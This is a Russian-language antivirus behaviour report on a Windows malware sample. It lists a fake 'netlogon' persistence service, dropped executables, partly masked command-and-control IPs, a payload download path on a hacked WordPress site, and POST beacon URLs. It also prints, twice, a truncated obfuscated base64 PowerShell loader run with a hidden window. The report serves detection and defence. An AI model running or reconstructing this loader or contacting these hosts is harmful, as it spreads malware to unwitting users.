Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- 'netlogon' "%WINDIR%\SysWOW64\xwtpdui\netlogon.exe"
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABVAGgAeABxADQAbAB1AD0AKAAoACcAQwBzACcAKwAnAGQAaQBuACcAKQArACcAawAnACsAJwAwACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBwAFIATwBmAEkATABFAFwAdQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\uofwsuv\lnxyn6_\mjlzifmu.exe
Перемещает следующие файлы
- %HOMEPATH%\uofwsuv\lnxyn6_\mjlzifmu.exe в %WINDIR%\syswow64\xwtpdui\netlogon.exe
Сетевая активность
Подключается к
- '74.##9.172.26':80
- '13#.#09.36.254':8080
- '10#.#56.59.7':8080
- '12#.#38.30.150':8080
- '19#.#87.133.160':443
- '10#.#36.246.93':8080
- '74.##8.45.104':8080
- '78.##7.156.31':80
TCP
Запросы HTTP GET
- http://rh####-building.com/wp-admin/Ey8qV0/
Запросы HTTP POST
- http://13#.##9.36.254:8080/r9v1gboUiWcf6bTsd2a/31D1eaiK55q2XMU/WE15UKxljAow20wjp/S4ykY7P1sBTS5GuQ/dIKKN7yqT/G96svS73lzXtHou/ via 13#.#09.36.254
- http://12#.##8.30.150:8080/qDoU/Xzao6qhh/kSfoMkIYw1jIyw5A/ via 12#.#38.30.150
- http://78.##7.156.31/TNDz/
UDP
- DNS ASK rh####-building.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\uofwsuv\lnxyn6_\mjlzifmu.exe'
- '%WINDIR%\syswow64\xwtpdui\netlogon.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABVAGgAeABxADQAbAB1AD0AKAAoACcAQwBzACcAKwAnAGQAaQBuACcAKQArACcAawAnACsAJwAwACcAKQA7ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBwAFIATwBmAEkATABFAFwAdQ...' (со скрытым окном)
